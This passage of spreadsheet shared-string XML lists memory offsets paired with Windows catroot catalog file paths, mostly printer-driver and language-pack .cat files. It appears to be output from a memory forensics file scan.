    <t>0xdf72cf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72d1a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnfx002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72d560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00g.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72d6a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00l.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72d878</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00f.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72db90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00e.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72dee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00c.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72e138</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnhp003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72e278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnhp004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72e450</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnhp002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72e768</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prngt004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72eb28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prngt002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72ec68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prngt003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72ee40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnge001.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72f340</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnkm002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72f700</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnin003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72f840</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnin004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72fa18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnin002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72fd30</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnhp005.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7302e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf730420</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky005.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7305f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf730910</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf730cd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnkm004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf730e10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnkm005.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf730f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnkm003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7311e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnle003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7314f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnle002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7316e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7318b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky008.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7319f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky009.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf731bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky007.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf731ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky006.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf732138</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx007.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7324f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx005.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf732638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx006.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf732810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf732b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf732ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnle004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf733210</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00e.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7333e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00c.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf733700</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00b.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf733ac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx009.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf733c00</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00a.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf733dd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx008.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf734028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00d.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf734108</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnnr003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7342e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00z.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7346a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00x.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7347e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00y.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7349b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00w.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf734cd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00v.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf735278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnok002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7353b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf735590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnod002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7358a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnnr004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf735c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnnr002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf735f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnms002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7361a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc00a.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7364b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc007.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf736878</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc005.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf736b90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf736cd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc006.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf736e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf737450</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnso002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf737590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnsv002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf737768</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnsh002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf737a80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnsa002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf737e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc00b.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf737f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc00c.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf738028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnsv003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf738148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientEnt</t>
  </si>
  <si>
    <t>erprise~31bf3</t>
  </si>
  <si>
    <t>6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf738320</t>
  </si>
  <si>
    <t>n-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf738638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnxx002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7389f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnts002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf738b38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnts003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf738d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnsv004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7391e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Down</t>
  </si>
  <si>
    <t>levelApisets-</t>
  </si>
  <si>
    <t>Base-WinIP-</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~bg-BG~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf739500</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~ar-SA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf739640</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~cs-CZ~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7397a0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~de-DE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7398e0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~en-US~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf739ab8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~da-DK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf739c28</t>
  </si>
  <si>
    <t>0xdf739f80</t>
  </si>
  <si>
    <t>n-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73a1c0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~et-EE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73a4d8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~es-ES~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73a6e0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~fr-FR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73a8b8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~en-GB~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73abd0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~el-GR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73b288</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~hu-HU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73b5a0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~hr-HR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73b8b8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~hi-IN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73b9f8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~it-IT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73bbd0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~he-IL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73bee8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~fi-FI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73c258</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~nl-NL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73c570</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~lv-LV~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73c6b0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~pt-PT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73c888</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~lt-LT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73cba0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~ko-KR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73cce0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~nb-NO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73ceb8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~ja-JP~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73d288</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~sk-SK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73d5a0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~ru-RU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73d6e0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~sr-LATN-CS~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73d8b8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~ro-RO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73dbd0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~pt-BR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73dee8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~pl-PL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73e248</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~zh-CN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73e560</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~tr-TR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73e878</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~th-TH~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73e9b8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~uk-UA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73eb90</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~sv-SE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73eee8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~sl-SI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73f1e0</t>
  </si>
  <si>
    <t>Com-WinIP-P</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~cs-CZ~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73f320</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~de-DE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73f4f8</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~bg-BG~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73f8b8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73fbd0</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~zh-TW~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73fd10</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~ar-SA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf73fee8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~zh-HK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7401e0</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~es-ES~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7404f8</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~en-US~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf740810</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~en-GB~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf740950</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~et-EE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf740b28</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~el-GR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf740e40</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~da-DK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7411c0</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~hu-HU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7414d8</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~hi-IN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf741618</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~ko-KR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7417f0</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~he-IL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf741b08</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~fr-FR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf741c48</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~hr-HR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf741e20</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~fi-FI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7421c0</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~nb-NO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7424d8</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~lv-LV~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf742618</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~pl-PL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7427f0</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~lt-LT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf742b28</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~ja-JP~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf742e40</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~it-IT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7431e0</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~sk-SK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7434f8</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~ro-RO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf743810</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~pt-PT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf743950</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~ru-RU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf743b28</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~pt-BR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf743ee8</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~nl-NL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf744118</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~uk-UA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf744430</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~tr-TR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf744638</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~zh-HK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf744810</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~sv-SE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf744b28</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~sr-LATN-CS~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf744e40</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~sl-SI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf744f80</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~th-TH~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7451c0</t>
  </si>
  <si>
    <t>Shell-WinIP</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~bg-BG~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf745300</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~en-US~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7454d8</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~ar-SA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7457f0</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf745930</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~cs-CZ~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf745c68</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~zh-TW~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf745e40</t>
  </si>
  <si>
